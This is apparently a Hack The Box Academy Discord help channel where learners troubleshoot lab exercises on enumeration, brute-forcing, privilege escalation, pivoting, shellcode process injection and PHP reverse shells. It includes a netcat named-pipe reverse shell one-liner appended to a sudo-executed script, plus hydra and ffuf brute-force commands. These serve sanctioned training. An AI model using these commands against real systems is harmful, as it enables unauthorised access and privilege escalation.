#modules
you can put it in the same line
the target is a public_ip:port
so vpn won't change a thing
your system doesn't know how to route to the vhost.inlanefreight.htb:port
when i scanned for vhosts, it didn't yield any results.
tip: any time you find a vhost -- add it to /etc/hosts
your command is likely wrong
the command i used was: gobuster vhost -u http://inlanefreight.htb:58452 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt --append-domain
wrong list
alright thanks ill try some others
use one of the lists that was showcased multiple times in the module
you can also (safely) use 100 threads with gobuster without bricking the server/dropping connections
but subdomains-top1million- is the right set of lists
okay thanks Im pretty sure i used that before but ill try again!
it's one of the bigger lists
found it, thanks for the help. I looked back at my command history: when I ran the list the correct vhost was on, I terminated the search when it was 98% done because I thought it was likely just not in that list and would have appeared earlier lol. Duly noted, finish the scan.
2 things delete bc spoiler
ok
And 2 replace :MYPORT with just literally :PORT
Alright deleted. Thanks
@fathom pendant you seem to know a lot! If you don't mind a personal question, are you working on a path(s) in HTB or do you just mod here?
Attacking Common Services - Easy Lab
got the webshell and successfully uploaded a reverse shell. im listening and executing the shell with "shell.exe" in the webshell, but i don't catch anything from nc. the webshell doesn't do any commands other than whoami and downloading from the http server.
i assume i'm on the right path with the reverse shell, but don't see any other option
I mean... why not use the webshell to find and read the file, no revshell needed
Also, is the target windows?
I genuinely forget
If it is; then use windows commands to find files
It's likely that there's Outbound rules preventing the revshell connection
This isn't the channel to ask about boxes
This channel is for academy modules
Mb 👌
that's what i thought. yes it's windows. i tried earlier forfiles and dir which i didn't get anything from. somehow for /d %d in ("C:\Users\*") do dir /s /b "%d\flag.txt" worked ✅
Probs worth noting that if they are asking for admin flag its almost always on the admins desktop
For loops don't work too well in webshells
Because default env is cmd
s
This isn't the place to broadcast you need help
Module: Attacking Common Services
Chapter: Attacking Tomcat
- in the chapter, we're given 2 options to brute force Tomcat, a msf module and a python script
- but since it's a simple http basic auth login, why don't we use hydra instead, isn't it more straightforward than a python script?
hydra -L /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt -P /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt -f web01.inlanefreight.local -m /manager/html http-get -u -s 8180
yeah you can
I'm trying to follow the logic behind using a python script when you can use hydra. I can understand a python script alternative to a msf module (for OSCP or customization needs), but not really for a Basic Auth with hydra
it's just to show different ways you can do things, with some modifications you can make the script work with post forms
sorry
Fair enough, the course does talk about scripting after that
If I reset a lab does it reset for everyone else?
Hey, so I’m on the ARP spoofing and abnormality detection lab. I uploaded the resource for Wireshark and read through the lab instructions. The question asks me to submit the total count of ARP requests, and it’s showing 1, but the number at the bottom of Wireshark says 42. I ran the command (eth.src == 08:00:27:53:0c:ba && arp.opcode==1). Am I doing something wrong?
https://academy.hackthebox.com/module/54/section/502
Attacking Web Applications with Ffuf - Filtering section
I have added the target to /etc/hosts as academy.htb, then run the filtering scan to filter with VHosts (with a size greater than 900 to filter out empty pages), but I'm getting back hits on every name in the wordlist.
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://academy.htb:PORT/ -H 'Host: FUZZ.academy.htb' -fs 900
The question for the section is asking for 'what other VHosts do you get' ... I get all of them ....
then you'll need to adjust the filter
almost all the pages were 986 in size. made the filter that ....
-fs 900 filters out results exactly 900 bytes only
yes
thought it was only showing results above 900, and i was expecting to find the 1 i needed being larger than 900 ...
you won't know the right size until you get a hit, so filter by the size you don't want to see
that info is very helpful on the next one for para fuzzing lol
yea just tried that with para fuzzing and it worked a treat.
any one done the intro to assembly language module? Need help with the exercise in the section "Debugging with GDB" can pm me about this
what do you need help with
Can anyone guide me on how I can type the commands to get the answers for the following questions:
1) What is the name of the config file that has been created after 2020-03-03 and is smaller than 28k but larger than 25k?
2) How many files exist on the system that have the ".bak" extension?
3) Submit the full path of the "xxd" binary.
what os is it?
It's linux
It's from the linux fundamentals module, this section gives example commands and explanations
Correct, but I am struggling with this part as I don't quite know what I can type to get the information needed
Look at the example find command
I believe this section or another contains a list of common commands
If you're unsure you can always either do <command> --help or man <command> to read how to use it
post screenshots
Gotcha okay
what os is correct?
His account isn't linked, can't post screenshots here
Brother. This is linux

You have to have the drive and curiosity to be able to succeed,
Way ahead of you on that one, also like seeing what others have found that I may have not thought of
It's literally just reading the manual
Cool ill circle back to it and if I have more question I post it here
You'll run into that a fair bit in this field
The example command from this section pretty much gives you the answer to 1
which is another command that can help with 3
And find can also be used for 2
Perfect thank you @fathom pendant
Note config files are usually named; .conf, .cfg, or .config
Gotcha, good to know
need a hint for file upload attacks module im on the skills assessment trying to fuzz for extensions but the wordlist in the module isnt proving useful
Hello!
I'm on this module / section https://academy.hackthebox.com/module/77/section/859 and I'm having trouble working out what I should put as the 'TARGETURI' with metasploit. I know what exploit to use and why. I hope someone can help me.
Need help - I'm using browser based instance to complete the module chapter SMTP. For the last Q, I need to find the system username by enumeration. Upon multiple tries with different username wordlists, did not succeed. So took a hint and it says, I need to use the provided wordlist i.e Footprinting-wordlist. But I cannot find this wordlist in the browser instance. Tried find / -type f -iname "Footprint-Wordlist*" 2>/dev/null no result. Can someone please tell me where can I find this wordlist stored on the instance? Thank you in advance. And sorry if I overlooked/missed something or its silly. 🙃
put the target url, there are examples given
what module
it's in the resources button, scroll up
yes, where to find in the browser instance?
you don't, transfer it over
oh okay, on it
oh nvm i got it bruh
Done, thank you!
You don't need to change that variable
yup dw i got it down now
man im proud i did this 🤣
yeah l0l i tried to put like an empty space but it didn't work
so i was like how do i put 'nothing' so to say but its all figured now! 😄
im trying to get a privesc script to the target box but when i do the command it wont even start lol
from my own box*
this is more of like an error thing:
it should be like that but now when i do it:
like ive done it b4 idk why it wont work now
the server is running
wot? it told me to wait for the 200 code as that means its running
oh no wait
sorry l0l it's when the script is installed it says 200 mbbbbbb
it will only show if something send a request to it
im looking at the modules that shows ways of transferring files i think i got it now
The example shows the successful request to the running web server
Also you don't need sudo to run it on 8080
Any port > 1024 doesn't require sudo
i tried wget anyway it didnt work so its ok but yeah i was writing sudo cause the module also did sudo
when i learnt about the http server
When dealing with alternate ports you need to specify the port in the request
yea idk why module shows sudo for port 8080, not required
i did
wget http://[your_tun0]:port/[file]
but the target doesnt have wget
maybe it's a container
They can't access the internet
hmmm
some containers don't have wget
i did this and it didnt work
"Didn't work" what error?
Sudo is required for 8080 bro
as that was the thing i learnt earlier so i was like ok ill just use that
Did you get the request in your running http server?
Oh
I can't start a python server on 8080 without sudo
nope
You need to drop into a shell
is 8080 special or something
You're trying to run it from the meterpreter console
Idk
Type shell first
oh from /bin/sh?
No
i guess since reverse proxies tend to use 8080 it may have significance
You're not in an interactive session in msfconsole
You need to drop into the shell
At least in my laptop, running anything on 8080 requires sudo
python3 -c "import pty; pty.spawn('/bin/bash')"
You didn't fuck anything up
huh what distro are you using that you need sudo for 8080
It's just not a full shell
im very confused rn 
Ctrl + l will unfuck everything for u
I'm telling you how to get a more interactive shell
not familiar territory
Debian
This is a command you need to know very well
that is definitely not normal
smths not right... i did ctrl + l nothing happened
¯\_(ツ)_/¯
I was able to run it without sudo on my ParrotOS box
Do /bin/sh instead of /bin/bash then
ive never heard of python3 -c "import pty; pty.spawn('/bin/bash')" i dont think im supposed to do that yet
It's how you upgrade shells
That just gives you a stable shell
that's just to upgrade your TTY to something more familiar-looking
and also add some functionality
oh okay sorry lads man my head
What you're seeing, the ^[[A, is the literal key interpretation of the arrow keys
I said /bin/sh
oh l0l
Lol
fuck it, run the bin binary
No such file or directory
Type exit a few times to get out of it then
uh, maybe exit and spawn another shell
which python
Most targets have python3
sudo mkdir bin/bin
Calm down
Lol
Run the /bin/sh python command again
What exactly are you trying to do now?
it's just like the evil-winrm shell i broke after running a powerview cmdlet
Upgrade shell
get out of that shit so i get to my normal looking terminal

From a meterpreter payload
you can Ctrl+C, it'll ask if you want to terminate channel, press Y, then enter shell again at meterpreter prompt
The exploits won't always give you a clean looking shell
Just copy the command @fathom pendant gave you word by word
l0l ty
im back
i thought it would exit me out completely thats why i didnt do it
just to make sure it works, type whoami after dropping into shell
Now drop back into the shell with shell
oh
You only need to write it from the msfconsole part
cool
Ok
you can upgrade TTY now
Now
Doesn't msfconsole give you an upgraded shell automatically?
Not always
Oh
It depends on the payload/exploit
/bin/sh
/bin/bash would probably work
there u goooooooooo
mrb3n sounds like a regular user
The error was saying /bin/sh
ok now what i was actually here for
Now you can move forward with wget
damn bro no bash
Error: Source: User
cd to a dir you can write to
tru lemme check
/tmp/ is world writable
Are they trying to import something to the target VM?
im trying to import a PrivEsc script into the target VM, rn the LinEnum.sh
Oh ok
That's not a privesc script
It's an enumeration script
Sorry yeah but it will allow for a PrivEsc if it finds anything
Mb wasnt that precise i still gotta figure out all these words hehe
it will give you something to look into for your privesc
(sudo -l would get you some info faster btw)
you will also need to reference gtfobins
this. it's mentioned early in the path but i forgot about it, but so many of the exploits are done using info provided on this amazing resource. its now a go-to
yea, if, for example, you can run php as sudo, if you go to that website you will see commands that will help you use that to privesc. or similarly, if you can run vim without a password for sudo then check the site, it'll show you how to then get root
there's a windows version too, btw
lolbins
https://lolbas-project.github.io/ mb lolbas
Living Off the Land Binaries and Scripts
i think the thing I like a lot about LOLBAS is they also link to the related MITRE ATT&CK framework
definitely a great resource
Hi, can someone please help me with Attacking Common Services - Hard --- I cannot seem to be able to download anything from SMB 😦
make sure you are in a writable directory like /tmp/
omg thank you!
pretty cool skills assessment tbh
having a problem with this question
- Ensure you're in the directory
- Use the get command. Usage: "get filename.extension"
Oh you've answered it, nice
Module: Footprinting
Section: SMB
<-- would be sick if i got some help with this, not sure what im doing wrong
brother
you need to use the module name and section name
the endpoint isn't helpful at all
o shit okay
sorted
what is the customized version, usually it's samba smb but this isn't, use what you know to find the version
the answer is the full name including vX.X
it's asking about the network share you found, so --- get info about it 😉
at pivoting, i really have a problem with this question: Which of the routes that AutoRoute adds allows 172.16.5.19 to be reachable from the attack host? (Format: x.x.x.x/x.x.x.x). I can't get autoroute to work, because i can't find a session, and i followed the steps.
anyone can help me? or at least give me a hint? i can't find the session to run autoroute
to find your active sessions, in msfconsole you type "sessions"
then "sessions 2" to select the second one.
yes, but it's like i don't have a session
while i follow the steps, have a meterpreter, then set up the proxy server inside msfconsole, i mean i don't know why it isn't working
do you have to background the session, then run the autoroute ?
if you background the session, then you'll have a session to choose. if you have no session to choose, then you're not in a shell to begin with
i have 2 terminals, 1 with the revshell, and another with msfconsole in my attack host. I set up the proxychains inside msfconsole
something i am doing wrong/missing something
i think i just fixed it
yeah i saw a video about ligolo-ng but i am still behind. I found the 2 subnets, but now the answer is not correct
good job finding them. pivoting through and all the listeners/proxy's gets confusing
i need a nudge every now and then with that one
can i dm you one sec
yes
I suppose dictionary attacking w/ hydra or msf is not expected in the medium or hard footprinting lab right..?
only to the extent of whatever is taught
but the only thing i'll tell you: as long as you properly enumerate you'll be on the right path
took me a while but had very little time to spend on password module past 2 months 
maybe 3 hours per week if lucky 
Hi ya, I’m having issues with windows evasion module, process injection section. it seems like the payload is not being executed
I am also stuck in the same challenge. Can you nudge me ..
ayee gz! progress is progress
Module : Footprinting
Section : MSSQL
Question : Connect to the MSSQL instance running on the target using the account (backdoor:Password1), then list the non-default database present on the server.
What am I not doing right ? 🤔
Any hint ?
theres one word
Broken Authentication, the OTP part in the skills assessment, can someone help me out
if i solved the skill i told you 😂
read the example carefully
i was able to follow what the exercise wanted me to do and get code execution
but when i try to access the home directory i get this error
Hi everyone, Who knows why, with the same scan as in the lab, my bind version does not show?
Thanks sir !
i told you use burpsuite and what you learned in command injection to bypass space character
this is one of the few instances where you need to use pwnbox
can i Dm you for some help ?
ok
Thanks, it helped
Hello again,
I now have Target VM access with a path that doesn't require a sudo password. I need to make an NC listener that waits for a connection to my local VM with root access. I don't know what to do. I tried to apply what I learnt before, but it's a bit different.
explain more on what you need to do and what you tried to do
also module and section
https://academy.hackthebox.com/module/77/section/859
And script has discovered or sudo -l
From the previous section once I had this the sudo pwnage, I used this:
echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 8443 >/tmp/f' | tee -a monitor.sh
sudo /home/nibbler/personal/stuff/monitor.sh
and then:
on my local vm: nc -lvnp 8443 to catch root shell
I saw the pattern repeating, so I figured I'd do somewhat the same:
So I wrote:
echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <w.e my tun0 is> 8443 >/tmp/f' | tee -a /usr/bin/php
is that wrong? I figured this is where I went wrong
yes, previously monitor.sh is a script that you can write to, now php is a program you can run with sudo, but you don't have write permission to it
right
consult https://gtfobins.github.io/ and check the sudo section
will do, thank you Xre0Us I appreciate it
bruh yeah marcilee told me too i forgot but that was yday just woke up
hey guys, need help. I'm trying to complete the last Q from this module https://academy.hackthebox.com/module/112/section/1238 from browser based instance. but the instance does not have mysql tool. Tried installing from apt and manually via downloading the deb package but it is unsuccessful. Please tell me if I'm missing anything
let me give it a try 🙂
How can I get more cubes? I only have 30 cubes and I need 20 for the next module? aka the nmap enumeration module.
Prob go for subscriptions
I would need to be on subscription? I'm a high school student, I would assume that wouldn't go under your lists of "student" ?
worked like a charm, thanks for sharing!
Module: Footprinting
Medium Lab
Question: Am I supposed to extract the mssql db file exactly with the previously obtained credentials of sa and alex via smbclient? I didn't see 1433/TCP open from nmap. Or is there any way to interact inside out via smbclient or rpcclient?
https://academy.hackthebox.com/achievement/910766/80
i was so dumb nvm 
Authentication is probably the most straightforward and prevalent measure used to secure access to resources, and it's the first line of defense against unauthorized access. Broken authentication is listed as #7 on the 2021 OWASP Top 10 Web Application Security Risks, falling under the broader category of Identification and Authentication failur...
try other protocols like rdp
I figured out what it was, i was really dumb about it.
I always forgot about this and winrm
I forgot to let you know about it
A session token can be brute-forced if it lacks sufficient what? This answer is not correct: "A weak cryptographic algorithm". Can anyone help me please? #broken-authentication
why
Hey again, someone please help me with this issue (stuck since last 15mins) #starting-point message
module - https://academy.hackthebox.com/module/112/section/1246
Broken Authentication, Authentication Bypass via Parameter Modification
can someone help me?
I tried burp intruder with the wordlist 0 to 1000 but it doesn't seem like the right path
tried ffuf: ffuf -w /usr/share/seclists/Fuzzing/3-digits-000-999.txt -u "http://94.237.53.113:51211/admin.php?user_id=FUZZ" -fr "Could not load admin data. Please check your privileges." -fs 14484
next time just paste the issue here but try reinstalling
pip uninstall impacket
pipx uninstall impacket
pipx install impacket
-fr make no sense here
and run it without python3, just mssqlclient.py
tried this as well. No luck. There seems to be a new one that might not be discussed earlier (or maybe I missed that message while searching)
follow what I sent, don't install with pip
it worked 🤯
there's some python env issues with the current pwnbox image, pipx would handle it for you
@safe yoke dm please
Nice, thank you again!
BROKEN AUTHENTICATION
Skills Assessment
ffuf -w 4_token.txt -u http://94.237.49.212:34777/2fa.php -X POST -d "otp=FUZZ" -fr "Invalid OTP." -H "Content-Type: application/x-www-form-urlencoded" -b "PHPSESSID=batl5885t858e6l4ssvomnf1b8"
it doesn't work, why?
Hello guys, I'm in the module ATTACKING ENTERPRISE NETWORKS in the Web Enumeration & Exploitation part on question 2. No matter what I upload, I always get "JPG, JPEG, PNG & GIF files are allowed." even if, to test, I upload a real jpg or png or any other file. Following exactly what the solution says also doesn't work for some reason
worked. Issue with the machine, restart fixed it
@next bronze Hi ya, sorry for pinging, do you mind if I DM for help in Windows Defender "Process Injection" ?
I didn't do that module. I have implemented it in C but not C#, but the process should be similar, what are you having problems with
The process injection is crashing the process I want to inject to (eg. notepad.exe). I'm simply doing creating process, alloc memory RW, write shell code, set memory to RX and create remote thread. The crash point is at creating remote thread
have it print out the error using GetLastError https://learn.microsoft.com/en-us/windows/win32/api/errhandlingapi/nf-errhandlingapi-getlasterror and debug from the output
also make sure your target compile is the right architecture and build
I think it crashes in the notepad.txt process so I would need x64dbg it instead
yeah that works too
also iirc it's notepad.exe on windows 10 and Notepad.exe on win 11
no one answer @everyone
ah apparently notepad.exe is 32bit so it crashes when I try to run 64bit shell code lol
I've been having connectivity issues with pwnbox the past couple days. While I first start working on an exercise I start pinging the target IP but eventually the pings stop going through. If I wait long enough with the ping command still running, eventually the pings will start getting through again and I can proceed with the exercise. I've tried reverting/resetting the target but it doesn't prevent it from happening again.
have you reached out to support
No I have not. Is this how I do it?
correct
Ok I will. Thank you.
DM!
ah ok, the notepad in SysWOW64 should be 64 bit
Module: Information Gathering - Web Edition
Section: Skill Assessment
Question: "After crawling the inlanefreight.htb domain on the target system, what is the email address you have found? Respond with the full email, e.g., mail@inlanefreight.htb."
I'm using ffuf and zaproxy and I was fuzzing http://inlanefreight.htb:port/FUZZ url with these seclist wordlist: common.txt, big.txt, directory-list-2.3-medium.txt, raft-* etc but with no luck. I did the same for subdomain and hidden admin directory.
What am I missing? Can someone share a hint?
I am stuck from one day know .
sorry for the delay i dropped a message
Working on the Attacking Common Applications Skills Assessment II, fuzzing for vhosts. Any idea why I'm getting nothing but 'Status: 400' results back using GoBuster? Ffuf works just fine, just wondering if there's any issue with my GoBuster command or if I should consider uninstall/reinstall?
@inland nymph I didn't give permission to dm
I'm now trying to inject to 64bit notepad, and for some reason it returns no thread ID from creating remote thread. I checked GetLastError but got 0
No crashing anymore tho
but does the shellcode run? you can use x64dbg or process hacker to see the threads in a process
no, it didn't run, I have added breakpoint on where the shellcode is but got nothing
no threads have been created
print out the address of lpBaseAddress and examine in the debugger
add breakpoints after each operation
Did that but it didn't trigger the breakpoint
you can add a pause within your program itself
I meant the breakpoint in x64dbg for notepad.exe
for the visual studio code, I have stepped into each operation until CreateRemoteThread
@dense ferry Do you mind giving a hand on "Process Injection" for Windows Evasion, as the example isn't enough to get the task done, and I've been running into weird issues
yeah so is it being written into the allocated memory?
yup it has, the shellcode has been written to lpBaseAddress, the permission is also correct (RX)
I don't have access to my dev vm now so I can't test it, but the code is fairly standard for process injection, no reason why it shouldn't work
maybe try other programs?
the funny part is that if I pause the notepad.exe and move the RIP to where the shellcode is, it actually works
so I just don't get why createRemoteThread doesn't return a thread ID, meaning failed to create one, while calling GetLastError() returns 0 as well
yea, i just found out that visual studio by default setup "Any CPU" config which is 32bit....
sorry for bothering with you coz of this
ah okay at least it works now
Seems like binary in ProcessInjection doesn't get triggered
I generally don't recommend random pinging staff (even if they're the module author)
so do I post issue in erratum channel ?
Only if you believe it to be an error in content, and not you misunderstanding/not reading thoroughly
everything. I have near to 0 knowledge of assembly language. I'm setting my break point at the _start function and stepping but the program's terminating at address 13 so I can't get to 16 to analyze it.
this might be an issue with hex vs dec
i believe the debugger defaults to hex
whereas you're trying to step in dec
16 from hex --> dec = 21 iirc
16 in dec to hex is 10
INTRODUCTION TO DIGITAL FORENSICS
Evidence Acquisition Techniques & Tools
Visit the URL "https://127.0.0.1:8889/app/index.html#/search/all" and log in using the credentials: admin/password. After logging in, click on the circular symbol adjacent to "Client ID". Subsequently, select the displayed "Client ID" and click on "Collected". Initiate a new collection and gather artifacts labeled as "Windows.KapeFiles.Targets" using the _SANS_Triage configuration. Lastly, examine the collected artifacts and enter the name of the scheduled task that begins with 'A' and concludes with 'g' as your answer.
are in the screenshot the right artifacts?
https://academy.hackthebox.com/module/144/section/1255
Trying to grasp the concept of zone transfers. In this screenshot, is nsztm1.digi.ninja one of the Name Servers, while zonetransfer.me is the domain?
that's right
dig <type> @nameserver domain/website
the nameserver part can be an IP not just a FQDN
also as a note; remember you're seeing records relative to the server you query
so a record that's 127.0.0.1 on the query means it exists on the same host
When I attempt to retrieve the NS for inlanefreight.htb, there are no results.
Is the NS meant to be the generated target?
I ran the command $dig NS inlanefreight.htb btw
I think you forgot your nameserver
somebody online who knows this?
how do I switch the mode if that is the issue?
I thought that is what the command is supposed to be searching for/retrieving
you still need to give it an IP to search from
otherwise it defaults to public nameservers
And that would be the one generated for the question?
the dig command is like: dig (for the records) NS TXT A AAAA ... (related to this) domain @ dns server ip address (whatever ip address is used as a dns server). So it is a bit like searching for a file in a folder in a building.
but i don't know if it is clear for other readers...
Okay
So it should be formatted more like $dig NS inlanefreight.htb @generated_ip_address
or am i misunderstanding the name server
yeah if you look for the name server record that's what you can use
but you'll get results only if a DNS server is in use.
i dont know what you got. Generally if you have an IP:PORT that's not necessary, but if you have IP:PORT, that's most likely a virtual host
yes
this question uses a private ip 10.129.x.x
So i need to use the academy nameserver in order to retrieve the NS for inlanefreight.htb
then I use that NS to axfr request
i was checking the course and they say:
You can use the dig command to request a zone transfer:
$ dig axfr @nsztm1.digi.ninja zonetransfer.me
You use the generated ip
A zone transfer will also yield a NS record
And the A records
yeah it will drop everything
Okay got it
In short @rustic sage use the generated ip in place of the nameserver
Now i have to either count the records or find a flag to do it for me
Yeah
Ok thanks guys
For the a records question I suggest using regex to filter the A record lines
Don't forget about other possible zones (subdomains)
I just shortened it and counted it
so I just tested it, you can inject x64 payload into notepad at system32, if the OS is 64 bit, the program will run at 64 bit, that's why I didn't ask you to check the process type to begin with. so I'm not sure where is going wrong there because I've tested the code in the module and it works with minimal modifications
it doesn't get triggered likely because your program is running the wrong calc exe
also some screenshots or commands you've used would help
b _start (to set break point)
si (to step)
tried setting breakpoint after the point where program terminates and using
"jump" command though this doesnt work program still crashes.
Can you do _start + 10?
If your gdb is in hex that'll jump it the 16 steps
1-9A-F = 1-15
Can someone explain me,what is the "user's secret key" in this : TGT Issue: The KDC verifies the user's identity (usually through a password hash) and issues a TGT encrypted with the user's secret key. The TGT is valid for a specific period and allows the user to request service tickets without needing to re-authenticate.
maybe the user's secret key is the password hash...?because i can't think anything else
seems not, it says it is undefined when I tried to jump to that. Though here's a screenshot, the program seems to go down after 401013
It's a mix of things
Yeah, it's in hex
you breaking at the start then si and stop at the right place is all you need
mix means.. ?
10 in hex is 16 in base10
i got it,i meant mix of what.Ok thanks for the help ❤️
ok
Additional documentation for you @worn matrix
so the question giving me in decimal but the debugger is in hex got it
As I said earlier lol
Lol Im serious when I say in this area of debugging and assembly language im complete freaking noob. This is totally new paradigm for me. Havent messed around with stuff like this at all.
I even broke down what was happening
Going + 16 in hex was going + 22 in dec
Which is outside range, hence the fault
The question wants you to go + 16 in Dec, which is +10 in hex
tbh using hex is the way to go, in any debugger when you see memory address is always in hex
it's also cleaner since every step is 8 bytes
clean clean
ya I got it now thanks for explaining that.
Once you deal with it enough your brain will know how it goes
Just remember the powerfall
From l-r, you take the number of digits and do [16^(n-1) * x, 16^(n-2) * y....] where x is the digit in that place. And you repeat including when n-z is 0 (to represent the first digit place). This works in any base system
1054 in decimal can be represented as
[10^(4-1) * 1 + 10^(4-2) * 0 + 10^(4-3) * 5 + 10^(4-4) * 4]
If you want another way to think about it, count the places right to left and do n-1 where n is the place
Hello, I need help
Can someone help me please
In the HTB Windows priv module: 'Escalate privileges on the target host using the techniques demonstrated in this section. Submit the contents of the flag in the WeakPerms folder on the Administrator Desktop.'
I did the exploit and I was a member of the admin group, but I can't cd to the admin user to get the flag. I also tried changing ownership of the file and changing permissions, but I get permission denied.
close and reopen the terminal
update group policy and relog
I've been searching everywhere and trying everything to figure out why the $rax answer I'm getting isn't working on the Intro to Assembly GDB module. I've set the break at _start+16 and it keeps telling me cannot access memory at address 0xffffffffffffffda. If anyone is able to give a push in the right direction I would be forever grateful.
hi whatsup
are you opening the right file
also #welcome so that you can post images
I'm in the Password Attacks module, Pass the Ticket section. The creds provided for the lab aren't allowing me to RDP. Has anyone else had this issue?
I downloaded the gdb.zip and did the wget and source to get it to gef, and I was using the disasm file from the previous section since gdb doesn't allow you to 'gdb -q gdb'. If disasm isn't the right file, what file should I be using?
why can you not run gdb -q gdb
When I tried it before and used 'r' it gave me an error, but I just tried it again and it worked. Thank you ❤️
Is mysql installed by default on pwnbox? I tried to run it and command wasn't found. Looking for the binary now...
Don't think the labs allow internet access. I switched over the VPN instead but ty!!
doesn't look like the target is right or you're connected to vpn
Anyone having issues sending SQLi in the spawned targets? They constantly time out, but I know they're the right commands
nvm, using pwnbox. works far far better
Yeah there's probably something wrong with your network connection
if it's timing out it's some connection issue
I connect to the webpage where you input search terms. Normal terms execute properly, but once SQL commands go in, it starts timing out.
But the same commands copied into the pwnbox on the same site execute perfectly
So you're saying it's timing out when you try SQL payloads on the webapp?
Pwnbox web browser?
yes
is it connected to the vpn? and you shouldn't use pwnbox and vpn at the same time
Do you get a successful injection when using the payloads in pwnbox?
Yes, I am connected. If I wasn't, I wouldn't be able to load the initial page
yes
I just spawned one and it works over VPN
Yea, understood. It's not advised, but it's also the only thing that got it to work.
I mean you either use one or the other but not both
I say disconnect from the VPN, download another VPN ( TCP) and try again
Yea, I'll try that in a minute.
Can you ping the machine and check the packet loss?
I'm using US4
Measures latency of all HTB academy servers, requires ping3 module - measure-academy-latency.py
Although it doesn't show the packet loss, the connection seems okay from the ping tbh
the pwnbox connection seems fine
Should be fine
you can safely use 48 threads
New VPN connection (now on eu5 instead of eu4), with TCP, and same issues. It doesn't make any sense for a connection anyway. I've connected to the website that's susceptible to SQLi, and SQL commands are executed on the target's DB, not on my computer....
very frustrating
just a wild guess but do you have 3rd party AV that's blocking the sqli requests
That could be it, but I only use Windows Defender
In earlier parts of the module I was able to execute commands, and in the skills assessment I got my first inject in. So it's just so very strange
Yea, could be. I just hope that during the exam it won't be an issue lol
this was literally discussed earlier
gdb in hex, where the instructions they want you to jump to are in dec
just convert dec --> hex
16 in dec is 10 in hex
16 is normal decimal but the debugger running in hex and 16 is 10 in hex. You actually need to run to 10 address in the code and not to 16
After stepping to 10, read the hex value in rax above
i also suggest not using the integrated terminal
it's very buggy and sometimes 'freezes'
use the in-browser vm in fullscreen mode
if you can't run your own vm*
Hi all
I'm stuck here
AD module
Privlege Access last question
Leverage SQLAdmin rights to authenticate to the ACADEMY-EA-DB01 host (172.16.5.150). Submit the contents of the flag at C:\Users\damundsen\Desktop\flag.txt.
I write the correct commands but first it says connection successful then connection failed
you may be overthinking it; just connect to the mssqlclient and use xp_cmdshell
Databases are an important part of web application infrastructure and SQL (Structured Query Language) to store, retrieve, and manipulate information stored in them. SQL injection is a code injection technique used to take advantage of coding vulnerabilities and inject SQL queries via an application to bypass authentication, retrieve data from th...
crooooosin
I’m doing the Knowledge Check in the Getting Started part of CPTS path. I understand the exploit needed to establish a reverse shell, but when I use Netcat, I’m not getting anything in my terminal even though the PHP input I included has the same port specified.
learned a lot and got more comfortable with using sql!
does it have the right IP?
you also need to be running the nc command before you load the php page 😉
Does the syntax take the IP of the Pwnbox or the target machine?
why would you ask it to connect to itself?
I'm so confused, I can't connect via sqlclient either, it gives an error.
I wouldn’t unless the only other option wasn’t working either, lol.
are you using the provided parrot host?
yes
then you're likely missing something
so you have access to the internal network? 172.16.x.x on one of the interfaces?
no just access machine host 10.129.xxx
what's the error
It doesn't give any output but it takes too long
and powershell output
try with mssqlclient on the internal parrot host
there's a Privlege Access section in the AD module?
it's privileged access
but I chalk that up to a slight language barrier
it's for MSSQL, RDP, WinRM
ctrl f has failed me
???
Try a different browser
you are using the pwnbox
NOT the parrot host that's sitting on the internal network of the AD environment
dude... did you really forget this section?
SQL host is on the internal network
he can't access it via the pwnbox (directly)
yeah I know, I meant you've already asked them to check
yeah
Or clear the browser cache and retry
and now with this screenshot it confirms, he's thinking I'm referring to the pwnbox, which I'm not
there's the EA-ATTACK-01 host (or whatever it's called)
yes yes, I know you say to use the ssh attack machine
when I try the ssh I have the output permission denied for htb-student
or damundsen
so .... tried other browsers. Private sessions too. Still nothing. Then wondered if it's my ISP or similar, so I turned on Anon Surfer ..... and it worked.
did you even use the right password for htb-student
oh my god
Ohh
thanks for the suggestion. was directly the issue but sparked another potential problem!
What was that?
filtering through probably my ISP
Ye
otherwise, the AnonSurf wouldnt have fixed the issue
i normally run my VPN but had to tunnel it while doing the modules. was getting too much lag otherwise.
Ye ik I thought you had another issue lol
oh, and just realised ... AnonSurf runs you through tor ...
Yeah it does
just went through it myself and it's working as intended
I appreciate you checking. I’m still stumped in the same spot though. It has to be a syntax issue.
what's your command? (you can delete after)
One second. I’ll copy it from my laptop.
might be missing -windows-auth
and you replaced the 10.10.15.190 with YOUR tun0 address
I looked at something else, whoops
there's also a simpler way @rustic sage with the exec function
Is there a space between the ? and the php in your actual command too?
also, yea, as Candy said, that extra space does actually matter
No. I had it without the space in the actual command.
Idk why I edited that. My brain is fried.
well I just ran your command on my spawned instance and it works
Try other payloads ig
what's the listener command and output
the payload works
Since I can confirm that this in-fact works you can delete this
When you execute this, does the webpage keep loading or does it finish loading?
@rustic sage are you running your listener before or after you visit the theme page?
Yeah, it could be an issue with the listener setup if the webpage keeps rendering but no reverse shell is made
I run the listener, then refresh the page. Nothing happens.
what page are you refreshing?
Does the page finish refreshing
the http://ip/path/to/theme.php?
The theme page itself.
The admin one.
Does the loading thing keep spinning
Or does it load successfully
that's not the theme page
that's why you're not getting a callback
you're just refreshing the editor
oh my goodness
when you click the theme tab it will tell you where the page is located that you need to load
was that not shown in the module
this is more of a user error than a not being taught error
true
It’s fine, I’ll accept the fact that I am slow.
but the editor itself is not running the php code
but with this newfound knowledge you'll be able to get your callback :)
also as a general suggestion when using the pwnbox
use -s [tun0_ip] to have it only listen on the tun0 port
as the other interface is public facing; and you might get false hits from scrapers
This was the biggest bruh moment ever.
I spent like 4 hours on this box. And half of that was just me being stupid.
i've been there
tfw the instructions say "authenticate" and you do every other method but
Generally when you execute a reverse shell in a webpage, if it did execute properly, the page should keep loading indefinitely. If it doesn't, then the payload didn't get executed. So if it does load successfully, you know you're doing something wrong with the payload execution 🙂
I think you missed the plot
I've not done this module so probably 😂
he was loading the /admin/themes.php page, not the /theme/<themename>/template.php
Just curious, what's the place that's vulnerable for injection on this particular exercise?
not spoiling
it's part of the getting started module
you'll have to discover that for yourself
i've already said more than enough
Alr
